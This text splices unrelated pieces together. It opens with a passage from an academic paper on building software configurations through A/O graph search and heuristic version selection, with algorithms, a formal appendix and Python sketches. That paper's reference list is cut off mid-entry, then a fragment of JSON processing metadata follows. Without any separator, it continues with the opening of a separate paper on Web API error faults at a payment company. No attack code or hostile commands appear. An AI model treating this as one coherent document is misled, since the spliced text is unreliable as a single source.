where $\text{Rel}$ is a set of names of architectural relations, $\text{VariantCond}$ is a set each element of which consists of three parts: a family specification, a necessary condition for variant selection and a suitability condition for variant selection, and $\text{ConfConstr}$ is an expression (built up from references to heuristic functions) specifying a constraint for all components to be included in the configuration. A possible example of the generic configuration requirement is:
\[
gcr_M = (\{\text{contains}, \text{uses}, \text{decomp\_from}\},
\{(\star,\ \text{operating\_system} = \text{DOS} \land \text{communication\_language} = \text{Slovak},
\langle \text{progr\_language} = \text{Prolog},
\text{prefer a version with a greater number of defined attributes},
\text{prefer a version with a smaller number of defined architectural relations to other components} \rangle)\},
\neg(\text{progr\_language}(x) = \text{Prolog} \land \text{progr\_language}(y) = \text{Pascal})).
\]
Let us note that in the example, the requirements for variant selection are the same for all families in the software system (denoted as $\star$).
We shall write the bound configuration requirement as a pair
\[ bcr_M = (\text{ExpCond}, \text{RevisionCond}), \]
where $\text{ExpCond}$ is an expression specifying a condition for the selection of exported components, and $\text{RevisionCond}$ is a set each element of which consists of two parts: a family specification and a suitability condition for revision selection. A possible example of the bound configuration requirement is:
\[ bcr_M = (\text{true}, \{(\star,\ \langle \text{author} = \text{maria},\ \text{date} \leq 17.6.94,\ \text{state} = \text{tested} \rangle)\}). \]

4 Method for building a configuration

We understand, in accordance with most of the literature, the notion of a software system configuration to be a set of components which is complete, consistent and satisfies the required properties. In our terminology, this corresponds to the notion of a bound configuration. Our approach is based on the assumption that all software components which can possibly be needed in the process of configuration building are available. However, having in mind the fact that the activities of configuration building and using [2, 6] can be separated, the above assumption is not a real restriction. Our method of building a software system configuration makes use of some ideas from previous works, especially those of [11, 25, 18, 2, 6, 1]. The method describes a procedure for finding the set of components included in the bound configuration. In the course of applying the procedure, a generic configuration is formed. This product can be used when a change of the software system is attempted. Reusing it frees us from the necessity of creating the configuration from scratch next time. Now we preview the main points of our method for building a configuration. In order to build a configuration which would meet the requirements, our method takes into account knowledge about the architectural relations between components and also about selecting components.
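The two requirement structures can be encoded directly; in the sketch below the field names mirror the paper's notation ($Rel$, $VariantCond$, $ConfConstr$, $ExpCond$, $RevisionCond$), while the attribute keys and lambda bodies are illustrative assumptions only:

```python
from dataclasses import dataclass
from typing import Callable, List, Set, Tuple

@dataclass
class GenericConfRequirement:
    rel: Set[str]              # names of architectural relations (Rel)
    variant_cond: List[Tuple]  # (family spec, necessary cond, suitability conds)
    conf_constr: Callable      # constraint over all selected components

@dataclass
class BoundConfRequirement:
    exp_cond: Callable         # condition for exported components (ExpCond)
    revision_cond: List[Tuple] # (family spec, suitability conds)

gcr = GenericConfRequirement(
    rel={"contains", "uses", "decomp_from"},
    variant_cond=[("*",
                   lambda v: v.get("os") == "DOS",
                   [lambda vs: [v for v in vs if v.get("lang") == "Prolog"]])],
    conf_constr=lambda components: components,
)

bcr = BoundConfRequirement(
    exp_cond=lambda component: True,
    revision_cond=[("*", [lambda rs: [r for r in rs if r.get("state") == "tested"]])],
)
```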
The method must cope with three important tasks. The first subtask is to determine which component families shall be considered in building the configuration. The selection of component families is based on edges originating in $A$-nodes and on a component selection condition (the exported components condition). In selecting the considered component families, a subgraph of the system model is selected such that it is formed only by edges representing the relations specified in the configuration requirement. The exported components selection is performed after completing the second task. Removing nodes which do not satisfy the exported components condition can cause the removal of their successors, which has to be considered. The second subtask is to search this subgraph in such a way that for each $A$-node all successors are selected and for each $O$-node exactly one successor is selected. A successor to an $O$-node (i.e., a family) is one of its variants. A problem arises here in those cases when either more than one variant satisfies the requirements, or there is no such variant at all. The problem resembles the kinds of problems tackled by artificial intelligence techniques. In evaluating the suitability of possible alternatives of the solution, heuristic information is used. It can be expressed e.g. in the form of a heuristic function which assigns to each alternative a value from some well-ordered set. The value estimates how suitable or promising it is to select the given alternative in the actual state. In the case of software component selection, it is difficult to express a heuristic function which would define an ordering of versions based on their suitability. Various aspects must be taken into account, such as what kind of software system is being built, and what are the requirements and properties of the versions. The aspects should be assigned weights according to their relative importance.
We have found it more advantageous not to attempt to order the versions according to their suitability, but rather to delete step by step the least suitable ones from the set of all possible versions [16]. We understand the strategy of version selection to be based on a sequence of heuristic functions which reduce the set of suitable versions as identified by the software component family. The heuristic functions are evaluated in two steps: (1) applying the necessary selection condition and (2) applying the suitability selection condition. Finally, the third subtask is to select a set of revisions, i.e. a set of components which form the bound configuration. Here, for each variant from a generic configuration, a suitable revision must be selected according to the requirements for revision selection. The method for selecting the most suitable revision is in fact similar to the above one for selecting the most suitable variants. An overall scheme of our method is in Figure 3. A detailed specification of the method is given in the Appendix. The above description of the method specifies in fact only what is to be achieved in the respective steps. How this can be done shall now be presented for each of the principal steps of our method.

4.1 Forming the subgraph

In step 1.1, a subgraph of the system's model $M$ is to be formed in such a way that all its $A$-edges represent only relations indicated in $gcr_M.Rel$. The task can be described as searching the graph $M$ from its roots and selecting exclusively such edges and nodes which satisfy the condition stated in 1.1. The algorithm uses two data structures which we denote as CLOSED (listing all nodes all the successors of which have been processed already) and OPEN (listing all nodes of which only the predecessors, but not the successors, have been processed yet). Both CLOSED and OPEN list the nodes along with pointers to their respective predecessors, which are useful in forming the resulting graph $F$.
Therefore CLOSED and OPEN are both sets of elements which are pairs $(Node, Pred)$, where $Node \in N$, $Pred \subseteq N$.

**Input:** model $M = (N, E)$ of the software system, a generic configuration requirement $gcr_M$ for the model $M$.

**Output:** graph $F = (FN, FE)$

1. Push the roots of the graph $M$ into the set OPEN. Initialize CLOSED to an empty set:
$$OPEN \leftarrow \{ (x, \{\}) \mid x \in N \land \neg (\exists y((y, x) \in E)) \}$$
$$CLOSED \leftarrow \{ \}$$
2. If OPEN is empty then halt, with the sets $FN$ and $FE$ formed as follows:
$$FN = \{ x \mid \exists u(u \in CLOSED \land u.Node = x) \}$$
$$FE = \{ (x, y) \mid \exists u(u \in CLOSED \land x \in u.Pred \land y = u.Node) \}$$
3. $e \leftarrow$ an element selected from OPEN; delete $e$ from OPEN.
4. If $\exists p ((e.Node, p) \in CLOSED)$ then $(e.Node, p) \leftarrow (e.Node, p \cup e.Pred)$ (i.e. extend $p$ with a pointer back to $e.Pred$) and go to 2.
5. If $e.Node$ is an $A$-node in graph $M$ then for each successor $e.succ$ of $e.Node$ do:
   if $\exists k \exists r(k \in e.Node \land r \in k.ArchRel \land r.RelationId \in gcr_M.Rel \land r.FamilyId = e.succ)$
   then push $(e.succ, \{e.Node\})$ into OPEN;
   push $e$ into CLOSED and go to 2.
6. If $e.Node$ is an $O$-node in graph $M$ then for each successor $e.succ$ of $e.Node$ do:
   push $(e.succ, \{e.Node\})$ into OPEN;
   push $e$ into CLOSED and go to 2.

The result of applying step 1.1 of the method to the model of the software system from Figure 2, using the generic configuration requirement described in Section 3, is depicted in Figure 4.

![Figure 4: A/O graph after the step 1.1.](image)

4.2 Forming the generic configuration

In step 1.2 of the method, the generic configuration $G_M$ is to be formed. Input to this step is the graph $F$ formed in the previous step 1.1. The graph $G_M$ includes all the roots of $F$. It includes just one successor of each $O$-node of $F$ included in $G_M$.
It includes all the successors of each $A$-node of $F$ included in $G_M$. Moreover, the nodes in $G_M$ must meet the constraints defined in the generic configuration requirement $gcr_M.ConfConstr$. The task can be described as searching the A/O graph $F$ starting from its roots and always selecting nodes which satisfy the above conditions. However, the algorithm is not as simple as the similar one in step 1.1. The reason is the additional condition that the graph, i.e. the set of nodes, must be consistent with respect to the given constraints. A further complication is due to the fact that the method of selecting the version, used in finding the successor of an $O$-node, can fail. As a consequence, the situation can occur that the graph being formed is not consistent. It must be modified in that case. We have devised and implemented the method in a logic programming environment using techniques especially designed to cope with this challenge. More specifically, it is based on identifying the reason for a deadend. The algorithm attempts to find a place in the graph where the search for an alternative solution should be resumed. The aim is to keep the number of visited nodes and the number of performed consistency checks as small as possible. The technique of node marking is used as well [4]. The result of applying step 1.2 of the method to the model of the software system from Figure 2 is depicted in Figure 5. As was stated earlier, in step 1.2 of the method for building a configuration, exactly one successor to each $O$-node is selected by applying the method of version selection. Version selection is controlled by knowledge in the form of heuristic functions which refer to properties of versions.

![Figure 5: Generic configuration built from A/O graph in Figure 4.](image)

4.3 Making provisions to include exported components

In step 2.1 of the method, the condition of exported components selection $bcr_M.ExpCond$ is applied.
The condition is represented by a function which assigns to each software component a value from $\{satisfies, does\_not\_satisfy\}$. The condition of exported components selection refers only to properties which are the same for all components included in the given variant (architectural relations and functional attributes). Therefore, it suffices to apply it to any one component of each variant from the generic configuration $G_M$. The algorithm implementing the method is described in the following way:

**Input:** graph $G_M = (U, H)$

**Output:** set $VE$

1. $VE \leftarrow \{\}$
2. for each element $v \in U$:
   - if $v$ is an $A$-node
   - then $k \leftarrow$ an element selected from $v$ and
   - if $bcr_M.ExpCond(k) = satisfies$
   - then $VE \leftarrow VE \cup \{v\}$

The set of exported variants after applying step 2.1 of the method to the generic configuration from Figure 5, in the case where the condition of exported components is set to \textit{true}, is
$$VE = \{ EVAL.3, ACTIONS.1, INTERR.3, MANAGER.1, INFER.2 \},$$
i.e. all the variants from the generic configuration.

4.4 Forming the bound configuration

In the last step of the method of building the configuration, the bound configuration is formed by selecting a revision for each variant included in the set resulting from step 2.1. The selection takes place according to the revision selection condition $bcr_M.RevisionCond$. We apply our method of version selection accordingly.

5 Experimental evaluation

The above described method has been implemented in the Prolog language. The primary purpose of the implementation was to create a prototype system supporting the process of building software system configurations which would be suitable for experimentation. A logic formalism, like any declarative formalism in general, is an excellent tool to support browsing and reasoning about versions of objects, relationships and dependencies [10].
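The two-step version selection used throughout the method — a necessary condition followed by suitability filters applied in order of importance — can be sketched as follows. The skip-empty-filter behaviour is an assumption of this sketch; the paper only states that filters reduce the candidate set and that automatic selection can fail:

```python
def select_version(versions, necessary, filters):
    """Step-by-step reduction of a version set by heuristic functions.

    `necessary` keeps only the admissible versions; the suitability
    filters h1..hn then shrink the candidate set until (ideally) one
    version remains. Returns None when automatic selection fails.
    """
    candidates = [v for v in versions if necessary(v)]
    for h in filters:
        if len(candidates) <= 1:
            break                   # later filters never become applicable
        reduced = h(candidates)
        if reduced:                 # assumption: skip filters rejecting everything
            candidates = reduced
    return candidates[0] if len(candidates) == 1 else None

# Illustrative usage with hypothetical version attributes:
versions = [
    {"author": "maria", "state": "tested", "rev": 1},
    {"author": "maria", "state": "draft",  "rev": 2},
    {"author": "jan",   "state": "tested", "rev": 3},
]
picked = select_version(
    versions,
    necessary=lambda v: v["author"] == "maria",
    filters=[lambda vs: [v for v in vs if v["state"] == "tested"]],
)
```

This matches the observation in Section 5 that sufficiently selective filters reach a single version early, so filters scheduled later are never applied.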
We have performed several kinds of experiments aiming at an empirical evaluation of important properties of our method. For each kind, extensive tests were performed, in fact thousands of them, to gather data allowing certain conclusions. One kind of experiments concerns the version selection algorithm, which is part of our method. When analyzing this algorithm, we concentrated on the applications of elementary heuristic functions, which are the most expensive operations. The empirical analysis shows that for larger numbers of filters, the number of filter applications does not depend on the number of filters for a given number of versions. An explanation could be that if the filters are at least "reasonably", or "sufficiently", selective, then they succeed in arriving at one selected version "sufficiently" early, before the later scheduled filters (i.e., those with higher index $i$) ever become applicable. No matter how many more filters we include, they would never be applied. On the other hand, the number of filter applications depends linearly on the number of versions, as could be expected. The other kind of experiments concerns the algorithm for building the generic configuration. Essentially, it is a graph searching algorithm. It searches an $A/O$ graph to find a solution which additionally satisfies given constraints. Compared to the usual algorithm with chronological backtracking (CHB), our algorithm is based on two principal additional concepts. First, we have used a special version of dependency-directed backtracking to resolve the deadend situation. It analyses the reasons for inconsistency at the deadend node and uses the results in deciding which is the most promising node to visit next. This algorithm is further enhanced by a marking mechanism (RB) which allows recording and propagating the results of the analysis of the current deadend node. Our experiments were aimed at analysing how effective the proposed algorithm is in coping with backtracks.
We randomly generated problems, i.e. A/O graphs, and applied both algorithms to them. The number of backtracks necessary when solving a problem is compared to the number of backtracks of the usual chronological backtracking algorithm. By definition, the ratio is always 1 for the CHB algorithm. An alternative measure can be the number of consistency checks performed during the search of a particular graph. In fact, we have experimented with both of these measures. We report on results using the number of backtracks in this paper. Due to space limitations, we omit results using the latter; however, there has been a strong similarity between them. In Figure 6 we can see how the number of backtracks (denoted as BACK) for the newly proposed algorithm, which allows recording and propagating the results of the analysis of the current node (RB), depends on the number of backtracks for the basic algorithm with chronological backtracking (CHB).

![Figure 6: Number of backtracks for RB and CHB.](image)

In absolute numbers, the results show that the number of backtracks of the enhanced algorithm is less than the number of backtracks when performing the usual chronological backtracking for the same graph. The presented graph is based on the results of searching about 9000 generated graphs with 500 nodes each. The reason for not including experiments with higher numbers of nodes was that they are obviously more time consuming and we could not afford them in our relatively modest computing environment. On the other hand, we have tried some experiments with other values as well. Based on them, we feel supported in the claim that our results are representative regardless of this value.

6 Conclusions

The proposed techniques for configuration management are based on the general principle behind our approach: to allow software engineers to express information that can be interpreted by the tool that automates the support for software building.
In the following, we briefly summarize the most important properties of the proposed method for building the software system configuration. The method integrates "good" properties of some of the known approaches and, moreover, solves some of their weak points in an original way. We consider families to be equivalence classes. Variants are sets of components, i.e. revisions. Moreover, the architectural relations are defined between variants and families. In such a way, we make it possible to define various properties of particular variants with respect to architectural relations to other components. This is motivated by the fact that in practice we often have different architectural relations for alternative representations of some solutions when developing a software system. Our approach to building a configuration is to allow for an explicit specification of knowledge leading to constraining the model in such a way that only the required components would be included in the configuration. This approach was also used in other systems, cf. [13, 6, 11]. What is different is the structure of knowledge (configuration requirements), its representation and interpretation. Another important feature of our method is that relations between components, as well as their attributes and constraints, can be defined at the level where they actually occur, similarly to e.g. [6]. This also supports the process of forming the system's model, defining the components' interfaces, and, last but not least, writing the configuration requirements. In version selection, our approach offers a software engineer a framework for specifying various heuristics describing which versions are to be preferred. Using heuristic functions not only makes the process potentially capable of building better configurations, but also documents the preferences applied in selections. Our approach is similar to version selection in DSEE [11].
What is new is the distribution of the requirements for version selection into the necessary selection condition and the suitability selection condition, and the definition of their interpretation. The distinction becomes important, e.g., in selecting variants. Most of the requirement conditions are in fact just recommendations, so they can be formulated as suitability selection conditions. However, there are often certain requirements which must not be ignored, so they are formulated as necessary selection conditions. Important is the fact that our method for version selection can fail to select the most suitable version automatically. This complicates the automation of configuration building but reflects software development needs more adequately. The main strengths of our approach to configuration building are (1) consideration of the conceptual distinction between variants and revisions, (2) consideration of architectural relations at the variant level and (3) distribution of the requirements into several parts (a condition for the selection of exported components and a set of names of architectural relations). To the best of our knowledge, only the system ADELE [5] allows consideration of a subset of the defined architectural relations in a system model, but no condition for the selection of exported components. Other approaches simply consider all parts defined in a system model. Our modelling of a software system is limited by the fact that every change of functional properties in software component development results in a new variant, regardless of the real nature of the change. The system ADELE has a similar limitation, cf. [6]. The area of software configuration building requires further research. Our method assumes the components are available at the moment the configuration is built. We did not tackle the problem of effectively forming the derived components in response to changes. Another open problem is acquiring programming and problem knowledge on the suitability of component versions.
In cases when attributes of components are not known, for whatever reason, methods of reverse engineering could be attempted to supply them. The proposed method could be incorporated into a CASE tool. The CASE tool, however, would have to support preserving and maintaining versions of software components. Here, the proposed model is to be used.

Appendix

Specification of the method for building a configuration

**Input** to the method is:
- a software system model $M = (N, E)$ with roots $s_1, s_2, \ldots, s_m$,
- a generic configuration requirement $gcr_M = (Rel, VariantCond, ConfConstr)$,
- a bound configuration requirement $bcr_M = (ExpCond, RevisionCond)$.

**Output** from the method is:
- a generic configuration $G_M$ for the given model, and
- a bound configuration $B_{G_M}$ relative to the generic configuration, or
- failure.

1. **Forming a generic configuration**

1.1. **Input**: software system model $M = (N, E)$, and generic configuration requirement $gcr_M$
**Output**: a graph $F = (FN, FE)$, where $FN \subseteq N$, $FE \subseteq E$ and the following holds:
$$\forall i((i \geq 1 \land i \leq m) \Rightarrow s_i \in FN) \land$$
$$\forall n_1((n_1 \in FN \land (n_1 \text{ is O-node})) \Rightarrow$$
$$\forall n_2((n_2 \in N \land (n_1, n_2) \in E) \Rightarrow (n_2 \in FN \land (n_1, n_2) \in FE))) \land$$
$$\forall n_1((n_1 \in FN \land (n_1 \text{ is A-node})) \Rightarrow$$
$$\forall n_2(((n_2 \in N \land (n_1, n_2) \in E) \land$$
$$\exists k \exists r(k \in n_1 \land r \in k.ArchRel \land r.RelationId \in gcr_M.Rel \land$$
$$r.FamilyId = n_2)) \Rightarrow (n_2 \in FN \land (n_1, n_2) \in FE))) \land$$
$$\forall n(n \in FN \Rightarrow \exists i((s_i, n) \in FE^+)).$$

1.2.
**Input**: a graph $F = (FN, FE)$ formed in step 1.1, with roots $s_{F1}, s_{F2}, \ldots, s_{Fm}$, and generic configuration requirement $gcr_M$
**Output**: generic configuration $G_M = (U, H)$, where $U \subseteq FN, H \subseteq FE$ and the following holds:
$$\forall i((i \geq 1 \land i \leq m) \Rightarrow s_{Fi} \in U) \land$$
$$\forall n_1((n_1 \in U \land (n_1 \text{ is O-node})) \Rightarrow \exists ! n_2(n_2 \in U \land (n_1, n_2) \in H)) \land$$
$$\forall n_1((n_1 \in U \land (n_1 \text{ is A-node})) \Rightarrow$$
$$\forall n_2((n_2 \in FN \land (n_1, n_2) \in FE) \Rightarrow (n_2 \in U \land (n_1, n_2) \in H))) \land$$
$$\forall n(n \in U \Rightarrow \exists i((s_{Fi}, n) \in H^+)) \land$$
$$gcr_M.ConfConstr(U) = U \land$$
$$\forall n \forall k((n \in U \land (n \text{ is A-node}) \land k \in n) \Rightarrow k.Constr(U) = U).$$

Exactly one successor to each $O$-node (i.e., family) included in the graph $G_M$ is selected by applying our method of version selection. The method of version selection for an $O$-node $n$ is applied with the following inputs:
- the set of versions $MU = \{x \mid x \in FN \land (n, x) \in FE\}$, i.e. the variants included in the family represented by the node $n$,
- the version selection requirement, i.e. the necessary condition for variant selection and the suitability condition for variant selection taken from $gcr_M.VariantCond$.

Output is the selected element from the set $MU$, i.e. a successor of the node $n$.

2. **Forming a bound configuration**

2.1. **Input:** generic configuration $G_M = (U, H)$ formed in step 1.2, bound configuration requirement $bcr_M$
**Output:** set of exported variants $VE$ such that the following holds:
$$VE = \{v \mid v \in U \land (v \text{ is } A\text{-node}) \land \forall k(k \in v \Rightarrow bcr_M.ExpCond(k) = satisfies)\}$$

2.2. **Input:** set of exported variants $VE$ formed in step 2.1, bound configuration requirement $bcr_M$
**Output:** bound configuration, i.e.
a set of software components $V$ such that the following holds:
$$V = \{k \mid \exists v(v \in VE \land k \in v)\},$$
where for each variant included in the set $VE$ exactly one component has been selected by applying the method of version selection. In this case, the method of version selection is applied for the variant $v$ with the following inputs:
- the set of versions in consideration $MU = \{k \mid k \in v\}$, i.e. the revisions included in the variant represented by the node $v$,
- the version selection requirement, i.e. the suitability condition for revision selection taken from $bcr_M.RevisionCond$.

Output is the selected element from the set $MU$, i.e. the software component (revision) included in the variant $v$.

References

15. K. Narayanaswamy and W. Scacchi, Maintaining configurations of evolving softwa-
[39879, 43880, null], [43880, 47166, null], [47166, 50376, null], [50376, 53883, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1023, true], [1023, 3256, null], [3256, 6778, null], [6778, 9784, null], [9784, 12815, null], [12815, 16963, null], [16963, 20511, null], [20511, 23331, null], [23331, 27267, null], [27267, 30731, null], [30731, 33803, null], [33803, 36362, null], [36362, 39879, null], [39879, 43880, null], [43880, 47166, null], [47166, 50376, null], [50376, 53883, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53883, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53883, null]], "pdf_page_numbers": [[0, 1023, 1], [1023, 3256, 2], [3256, 6778, 3], [6778, 9784, 4], [9784, 12815, 5], [12815, 16963, 6], [16963, 20511, 7], [20511, 23331, 8], [23331, 27267, 9], [27267, 30731, 10], [30731, 33803, 11], [33803, 36362, 12], [36362, 39879, 13], [39879, 43880, 14], [43880, 47166, 15], [47166, 50376, 16], [50376, 53883, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53883, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
aa2e9f9267616ac6af693d0d5348244bb9df042c
An Exploratory Study on Faults in Web API Integration in a Large-Scale Payment Company Aué, Joop; Aniche, Maurício; Lobbezoo, Maikel; van Deursen, Arie DOI 10.1145/3183519.3183537 Publication date 2018 Document Version Accepted author manuscript Published in ICSE-SEIP '18: 40th International Conference on Software Engineering: Software Engineering in Practice Track Citation (APA) Important note To cite this publication, please use the final published version (if applicable). Please check the document version above. Copyright Other than for strictly personal use, it is not permitted to download, forward or distribute the text or part of it, without the consent of the author(s) and/or copyright holder(s), unless the work is under an open content license such as Creative Commons. Takedown policy Please contact us and provide details if you believe this document breaches copyrights. We will remove access to the work immediately and investigate your claim. An Exploratory Study on Faults in Web API Integration in a Large-Scale Payment Company Joop Aué1,2, Maurício Aniche2, Maikel Lobbezoo1, Arie van Deursen2 1Adyen B.V., 2Delft University of Technology {joop.aué,maikel.lobbezoo}@adyen.com,{m.f.aniche,arie.vandeursen}@tudelft.nl ABSTRACT Service-oriented architectures are more popular than ever, and increasingly companies and organizations depend on services offered through Web APIs. The capabilities and complexity of Web APIs differ from service to service, and therefore the impact of API errors varies. API problem cases related to Adyen’s payment service were found to have a direct and considerable impact on API consumer applications. With more than 60,000 daily API errors, the potential impact is enormous. In an effort to reduce the impact of API related problems, we analyze 2.43 million API error responses to identify the underlying faults. We quantify the occurrence of faults in terms of the frequency and impacted API consumers.
We also challenge our quantitative results by means of a survey with 40 API consumers. Our results show that 1) faults in API integration can be grouped into 11 general causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party, 2) most faults can be attributed to the invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and 3) insufficient guidance on certain aspects of the integration and on how to recover from errors is an important challenge to developers. CCS CONCEPTS • Information systems → Web services; Web applications; • Software and its engineering; KEYWORDS web engineering, web API integration, web services. ACM Reference Format: Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org. ICSE-SEIP ’18, May 27-June 3 2018, Gothenburg, Sweden © 2018 Copyright held by the owner/author(s). Publication rights licensed to Association for Computing Machinery. ACM ISBN 978-1-4503-5659-6/18/05 ... $15.00 https://doi.org/10.1145/3183519.3183537 1http://www.adyen.com 1 INTRODUCTION Service-oriented architectures are now more popular than ever. Companies and organizations increasingly offer their services through Web Application Programming Interfaces (Web APIs).
Web APIs enable client developers to access third party services and data sources, and use them as building blocks for developing applications, e.g., Airbnb utilizes Google’s Calendar API to automatically insert bookings into the renter’s calendar, and Google Maps consumes Uber’s Ride Request API to offer Uber’s services as means of transportation in their maps application. The capabilities and complexity of Web APIs inevitably differ from service to service. Retrieving a list of followers for a user on Twitter requires a GET request including a single parameter, and posting a Twitter status update using the Twitter API takes a single parameter POST request. As the complexity of the actions increases, so do the possibilities of failure. For instance, Github’s Repo Merging API supports merging branches in a repository. In addition to the intended merge, other possible outcomes are a merge conflict, a missing branch error or a nothing to merge response. Adyen1, a multi-tenant Software as a Service (SaaS) platform that processes payments, offers an authorization request used to initiate a payment from a shopper, which takes up to 35 parameters. Multiple types of shopper interaction, and optional fields to optimize fraud detection and improve shopper experience lead to numerous failure scenarios. In addition to the happy path, the method can return at least 34 unique error messages to inform the API consumer that something has gone wrong. To make error handling for client developers easier, practitioners have written a variety of best practice guides and blog posts on API design [11] [21] [13] [18]. Apigee [1], a platform offering API tools and services for developers and enterprises, discusses error handling in multiple ebooks. Apigee’s error handling best practices focus on which HTTP status codes to use [2] and suggest returning detailed error messages for users and developers [3].
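As a minimal illustration of this best practice (our own sketch; the field names and error codes are assumptions, not Adyen's or Apigee's actual formats), an error response can pair an HTTP status code with a machine-readable error code and a human-readable message:

```python
import json

def make_error_response(status: int, error_code: str, message: str) -> dict:
    """Build a detailed error payload addressing both users and developers,
    in the spirit of the cited best-practice guides (hypothetical fields)."""
    return {
        "status": status,          # HTTP status code to return, e.g. 422
        "errorCode": error_code,   # stable, machine-readable identifier
        "message": message,        # human-readable explanation for debugging
    }

# Example: a validation failure surfaced with both a code and a message.
print(json.dumps(make_error_response(422, "invalidCardNumber",
                                     "Card number failed validation")))
```

A stable `errorCode` lets consumer applications branch on the failure programmatically, while the `message` helps the developer diagnose it.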
However, to our knowledge no research has been conducted on what type of errors occur in practice and what causes them to happen. Not only can this knowledge complement existing API design best practices, it can help improve API documentation and help developers understand the common integration pitfalls. The potential impact of API errors on API consumer applications is enormous. At the same time an understanding of API errors that occur in practice and their impact is missing. This gap of knowledge motivated us to investigate the domain of Web API errors. To this aim, we study the API error responses returned by Adyen web services which handle millions of API requests on a daily basis. We analyze 2.43 million error responses, which we extract from the platform’s production logs, discover the underlying faults, and group them into high-level causes. In addition, we survey API consumers about their perceptions on the impact and how often they observe such cases in their APIs, as well as practices and challenges they currently face when it comes to integrating to Web APIs. Finally, we provide API developers and consumers with recommendations that would help in reducing the number of existing integration errors. Our results show that (1) faults in API integration can be grouped into 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party. Each cause can be attributed to one of the four API integration stakeholders: end user, API consumer, API provider, and third parties; (2) most faults can be attributed to the invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and (3) API consumers most often use official API documentation to implement an API correctly, followed by code examples.
The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration and insights into problems and changes, insufficient understanding of the impact of problems, missing guidance on how to recover and a lack of details on the origin of errors. The main contributions of this work are as follows: (1) A classification of API faults, resulting in 11 causes of API faults, based on 2.43 million API error responses of a large industrial multi-tenant SaaS platform (Section 4.1). (2) An empirical understanding of the prevalence of API fault types in terms of the number of errors and impacted API consumers (Section 4.2). (3) An initial understanding of the impact of each cause as experienced by API consumers as well as their observations on current challenges during API integration (Section 4.3). (4) A set of recommendations for API providers and API consumers to reduce the impact of API related faults (Section 5.1). 2 BACKGROUND: UNDERSTANDING THE WEB API ENVIRONMENT An API integration can involve up to four different stakeholders that all influence the interaction between the API and its consumer. As a result, each of these stakeholders can cause the API to return an error that possibly leads to a failure in the consumer’s application. In this section, we give an overview of the API environment, the parties involved and API error related terminology, to clarify the differences and nuances that could lead to confusion. In a typical integration with an API, two stakeholders, or parties, are involved. On one side the API provider, offering their services by exposing an API, and on the other the API consumer, utilizing the services offered by communicating with the API. The API provider may optionally itself be connected to third party services behind the scenes in order to provide the intended functionality.
For instance, an API offering stock data may itself be connected to different stock exchanges to obtain the latest stock prices. We deliberately refer to API consumer, instead of API user, to leave room for the term end user. The API consumer may optionally provide an application used by its customers, who indirectly make use of the API’s services. These end users supply information, while using the application, that is used as request data for the API. For example, Google Maps users are given the option to choose Uber as means of transportation when searching for directions. Indirectly they are supplying input to the Uber API, which locates nearby drivers and estimates the cost for the trip. In the system under study, the API provider, Adyen, provides its payment services through its API. The API consumer is the merchant processing payments using the Adyen solution (e.g., a store). The end users are shoppers, who use the merchant’s services to buy goods or services. Finally, third parties connected to Adyen typically include banks, schemes, and issuers. Each of the stakeholders in the API stakeholder overview can, by introducing a fault, potentially cause an erroneous response to be returned by the API, which if unexpected can result in problems for the application. We provide an overview of the integration environment containing the involved stakeholders and the relation between faults, errors and failure in Figure 1. In case the API is indirectly in use by customers of the API consumer, the end user can, by supplying invalid information, cause the API to return an error. The API consumer, on the other hand, may have implemented the API incorrectly, which can result in requests with a specific input to be rejected by the API. The API provider may have a bug in its system, which could, for instance, cause requests to fail on a specific input. Lastly, when a third party service fails, the API provider may decide to return an error to the API consumer. 
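The fault-error-failure chain described above (and depicted in Figure 1) can be sketched as follows; this is an illustrative model of our own, and none of the names come from the paper's artifacts:

```python
from enum import Enum

class Stakeholder(Enum):
    """The four stakeholders that can introduce a fault (Section 2)."""
    END_USER = "end user"
    API_CONSUMER = "API consumer"
    API_PROVIDER = "API provider"
    THIRD_PARTY = "third party"

def propagate(fault_by: Stakeholder, consumer_handles_error: bool) -> str:
    """A fault surfaces as an API error; the error only becomes a failure
    in the consumer's application when it is unexpected or unhandled."""
    error = f"API error (fault introduced by {fault_by.value})"
    return (f"handled: {error}" if consumer_handles_error
            else f"failure: {error}")

# An end user supplying invalid input causes an error; if the consumer
# application does not anticipate it, the error turns into a failure.
print(propagate(Stakeholder.END_USER, consumer_handles_error=False))
```

The point of the model is that any of the four parties can originate the fault, but only the consumer's handling decides whether it ends as a failure.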
